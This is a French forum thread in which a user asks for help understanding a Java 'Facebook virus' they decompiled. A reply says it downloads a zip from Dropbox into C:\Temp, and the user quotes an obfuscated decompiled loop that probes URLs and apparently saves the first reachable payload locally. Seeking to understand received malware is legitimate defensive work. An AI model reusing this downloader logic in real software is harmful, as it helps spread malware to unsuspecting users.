Virus facebook
Un ami m'a envoyé un virus codé en java (c'est pas très gentil).
J'ai décompilé le .class et mis le code ici http://pastebin.com/rvKtXqui, il est plus lisible dans un éditeur (en enlevant le retour à la ligne automatique pour les lignes longues) et dans l'archive il y a dossier META-INF dans lequel il y a un ficher MANIFEST.MF
Est-ce qu'il y a un choual calé en code qui pourrait m'expliquer comment il fonctionne ?
Je t'ai décrit le fonctionnement ici :
http://pastebin.com/UdVXZ5Dg
En gros: Il télécharge sur dropbox un zip et le place à C:\Temp\
C'est à peu prés tout ce que j'ai récupérer.
@Benji: Wow super, merci beaucoup ! C'est une chouette technique d'exécuter le script à sa sauce et de voir ce qu'il sort.
@PrayForDan: C'est que je me suis dit en lisant cette boucle à la fin:
for (String str1 : arrayOfString1)
{
URL localURL = new URL(str1);
HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();
localHttpURLConnection.connect();
if (localHttpURLConnection.getResponseCode() / 100 == 2)
{
String str2 = str1;
String str3 = CCQTVKNAUSH() + ZQLCKNFOFZNYFWRJPSD();
GSMGKTSRIXYEMPSUH(str2, str3);
break;
}
}
Ouvrir des ports pour en faire un botnet ou télécharger un autre virus.
Mais tout ce qu'il y a avant ça m'échappe complet et j'aurais aimé qu'on m'explique vulgairement ce qui se fait.
Les variables il a du les appeler comme ça pour que ça fonctionne ou il les as toutes nommées normalement pour coder puis s'est amusée à leur mettre des noms à la con comme ZQLCKNFOFZNYFWRJPSD ?
Tu ne dois accéder à ce site que si tu as au moins 18 ans ou si tu as l'âge légal pour visionner ce type de matériel dans ta juridiction locale, l’âge le plus élevé étant retenu. En outre, tu déclares et garantis que tu ne permettras aucun mineur à d'accéder à ce site ou à ces services.
En accédant à ce site, tu acceptes nos conditions d'utilisation.